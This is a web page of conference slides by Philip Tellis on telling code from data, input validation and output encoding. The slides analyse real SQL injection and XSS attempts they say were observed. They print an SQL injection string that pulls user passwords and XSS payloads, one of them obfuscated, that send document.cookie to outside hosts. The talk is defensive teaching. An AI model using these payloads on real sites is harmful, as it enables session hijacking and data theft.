InterpoliqueInterpolique
Interpolique
 
Questioning the status quo
Questioning the status quoQuestioning the status quo
Questioning the status quo
 
OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019
 

More from Philip Tellis

Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonPhilip Tellis
 
Frontend Performance: De débutant à Expert à Fou Furieux
Frontend Performance: De débutant à Expert à Fou FurieuxFrontend Performance: De débutant à Expert à Fou Furieux
Frontend Performance: De débutant à Expert à Fou FurieuxPhilip Tellis
 
Frontend Performance: Expert to Crazy Person
Frontend Performance: Expert to Crazy PersonFrontend Performance: Expert to Crazy Person
Frontend Performance: Expert to Crazy PersonPhilip Tellis
 
Beyond Page Level Metrics
Beyond Page Level MetricsBeyond Page Level Metrics
Beyond Page Level MetricsPhilip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...Philip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonPhilip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonPhilip Tellis
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonPhilip Tellis
 
RUM Distillation 101 -- Part I
RUM Distillation 101 -- Part IRUM Distillation 101 -- Part I
RUM Distillation 101 -- Part IPhilip Tellis
 
Improving 3rd Party Script Performance With IFrames
Improving 3rd Party Script Performance With IFramesImproving 3rd Party Script Performance With IFrames
Improving 3rd Party Script Performance With IFramesPhilip Tellis
 
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"Philip Tellis
 
The Statistics of Web Performance Analysis
The Statistics of Web Performance AnalysisThe Statistics of Web Performance Analysis
The Statistics of Web Performance AnalysisPhilip Tellis
 
Abusing JavaScript to Measure Web Performance
Abusing JavaScript to Measure Web PerformanceAbusing JavaScript to Measure Web Performance
Abusing JavaScript to Measure Web PerformancePhilip Tellis
 
Analysing network characteristics with JavaScript
Analysing network characteristics with JavaScriptAnalysing network characteristics with JavaScript
Analysing network characteristics with JavaScriptPhilip Tellis
 
A Node.JS bag of goodies for analyzing Web Traffic
A Node.JS bag of goodies for analyzing Web TrafficA Node.JS bag of goodies for analyzing Web Traffic
A Node.JS bag of goodies for analyzing Web TrafficPhilip Tellis
 
Messing with JavaScript and the DOM to measure network characteristics
Messing with JavaScript and the DOM to measure network characteristicsMessing with JavaScript and the DOM to measure network characteristics
Messing with JavaScript and the DOM to measure network characteristicsPhilip Tellis
 
Boomerang: How fast do users think your site is?
Boomerang: How fast do users think your site is?Boomerang: How fast do users think your site is?
Boomerang: How fast do users think your site is?Philip Tellis
 

More from Philip Tellis (20)

Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy Person
 
Frontend Performance: De débutant à Expert à Fou Furieux
Frontend Performance: De débutant à Expert à Fou FurieuxFrontend Performance: De débutant à Expert à Fou Furieux
Frontend Performance: De débutant à Expert à Fou Furieux
 
Frontend Performance: Expert to Crazy Person
Frontend Performance: Expert to Crazy PersonFrontend Performance: Expert to Crazy Person
Frontend Performance: Expert to Crazy Person
 
Beyond Page Level Metrics
Beyond Page Level MetricsBeyond Page Level Metrics
Beyond Page Level Metrics
 
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ...
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy Person
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy Person
 
Frontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy PersonFrontend Performance: Beginner to Expert to Crazy Person
Frontend Performance: Beginner to Expert to Crazy Person
 
mmm... beacons
mmm... beaconsmmm... beacons
mmm... beacons
 
RUM Distillation 101 -- Part I
RUM Distillation 101 -- Part IRUM Distillation 101 -- Part I
RUM Distillation 101 -- Part I
 
Improving 3rd Party Script Performance With IFrames
Improving 3rd Party Script Performance With IFramesImproving 3rd Party Script Performance With IFrames
Improving 3rd Party Script Performance With IFrames
 
Extending Boomerang
Extending BoomerangExtending Boomerang
Extending Boomerang
 
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?"
 
The Statistics of Web Performance Analysis
The Statistics of Web Performance AnalysisThe Statistics of Web Performance Analysis
The Statistics of Web Performance Analysis
 
Abusing JavaScript to Measure Web Performance
Abusing JavaScript to Measure Web PerformanceAbusing JavaScript to Measure Web Performance
Abusing JavaScript to Measure Web Performance
 
Rum for Breakfast
Rum for BreakfastRum for Breakfast
Rum for Breakfast
 
Analysing network characteristics with JavaScript
Analysing network characteristics with JavaScriptAnalysing network characteristics with JavaScript
Analysing network characteristics with JavaScript
 
A Node.JS bag of goodies for analyzing Web Traffic
A Node.JS bag of goodies for analyzing Web TrafficA Node.JS bag of goodies for analyzing Web Traffic
A Node.JS bag of goodies for analyzing Web Traffic
 
Messing with JavaScript and the DOM to measure network characteristics
Messing with JavaScript and the DOM to measure network characteristicsMessing with JavaScript and the DOM to measure network characteristics
Messing with JavaScript and the DOM to measure network characteristics
 
Boomerang: How fast do users think your site is?
Boomerang: How fast do users think your site is?Boomerang: How fast do users think your site is?
Boomerang: How fast do users think your site is?
 

Recently uploaded

Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 

Recently uploaded (20)

Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 

IWYGWYETG - Is What You Get What You Expect to Get

  • 1. Is What You Get, What You Expect to Get? Philip Tellis / philip@lognormal.com ConFoo.ca / 2012-03-01 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
  • 2. IWYGWYETG ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 2
  • 3. $ finger philip Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 3
  • 4. WARNING ! This presentation may contain unreadable code. Attempting to read it is probably not worthwhile. Definitely not at 08:30. Screaming WTF!!1! probably is. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 4
  • 5. How do you distinguish code from data? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 5
  • 6. < > ’ " & % ‘ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 6
  • 7. Failure to tell the difference. . . ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 7
  • 8. Note: This talk is NOT about XSS or SQLi, but it might seem like it ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 8
  • 9. Let’s look at a few examples ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 9
  • 10. http://xxyyzz.com/forms/contact_form.asp?i= 0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28 %27%3c%28%20%27%2buserId%29,%28firstname %2b%27%20%27%2blastname%29,%28address%2b %27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16, %28email%2b%27%20-Password:%20%27%27 %2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21, 22,23,24,25,26,27,28,29,30%20FROM%20 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 10
  • 11. http://xxyyzz.com/forms/contact_form.asp?i= 0’ UNION ALL SELECT 1,2,3,4,5, ( ’ < ( ’ + userId ) , ( firstname + ’ ’ + lastname ) , ( address + ’ city: ’ + city ) ,9,10,11,12,13,14,15,16, ( email + ’ -Password: ’ ’ + userpwd + ’ ) > ’ ) ,18,19,20,21, 22,23,24,25,26,27,28,29,30 FROM ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 11
  • 12. Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 12
  • 13. <?php $id = htmlspecialchars($_GET[ ’id’ ]); ?> ... value : <?php echo ($id) ? $id : ’null’; ?> This is JavaScript code generated by PHP ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 13
  • 14. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 15. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 16. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 17. Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 15
  • 18. <a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 19. <a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 20. use the quotes luke <a " <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 21. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  • 22. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  • 23. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  • 24. The char codes translate to: <img src=x onerror=(document.location=’ http://standard33.freehostia.com/CS/lg.php?info=’ +escape(document.cookie))> $f was html encoded, but used unquoted as an attribute value. Remember that spaces are never encoded. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 18
  • 25. Expected a stock symbol, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 19
  • 26. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 27. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 28. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 29. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 30. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 31. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 32. h=u0022u003eu003cimgu0020srcu003du0022foou0022u0020 onerroru003du0022alert(u0027xssu0027) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 33. h= " > < img src = " foo " onerror = " alert( ’ xss ’ ) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 34. h="><img src="foo" onerror="alert(’xss’) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 35. Expected a hostname, but got something completely different ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 22
  • 36. Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 37. Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > That’s 0xe0, start of 3 byte seq ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 38. Dear IE6 <input value=""onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 39. Expected valid UTF-8, got invalid UTF-8 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 24
  • 40. So what’s the common theme here? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 25
  • 41. Should I be Validating Input or Encoding Output? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 26
  • 42. They solve two different problems, and you need both ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 27
  • 43. Output Encoding (done automatically by your framework) protects your users from XSS ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 28
  • 44. Input Validation is a data quality issue ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 29
  • 45. Is the input you get from a user of the type and range that you expect it to be? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 30
  • 46. Sometimes it results in back end code injection ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 31
  • 47. But it always results in bad data ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 32
  • 48. Bonus Example: This hit me in production yesterday ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 33
  • 49. regex to check if text was a subdomain of a known domain re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’); re.exec(ref) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 34
  • 50. Sometimes IE8 will serve requests from a .mht file mhtml:file://C:Usersblah-blah-blah.mht ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 35
  • 51. I expected the regex to reject this text ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 36
  • 52. What I got was 100% CPU spent in regex backtracking ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 37
  • 53. ;( ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 38
  • 54. Unrelated Bonus Example: From a WordPress theme ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 39
  • 55. <?php $value=htmlspecialchars($_GET[’value’], ENT_QUOTES); ?> <input type="text" value="<?php echo $value ?>" onfocus="if(this.value==’<?php echo $value ?>’) {this.value = ’’;}" /> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 40
  • 56. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 57. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 58. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’’ +alert(/xss/)+ ’’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 59. I have no idea what was expected here ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 42
  • 60. Questions? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 43
  • 61. Contact me Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ slideshare.net/bluesmoon ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 44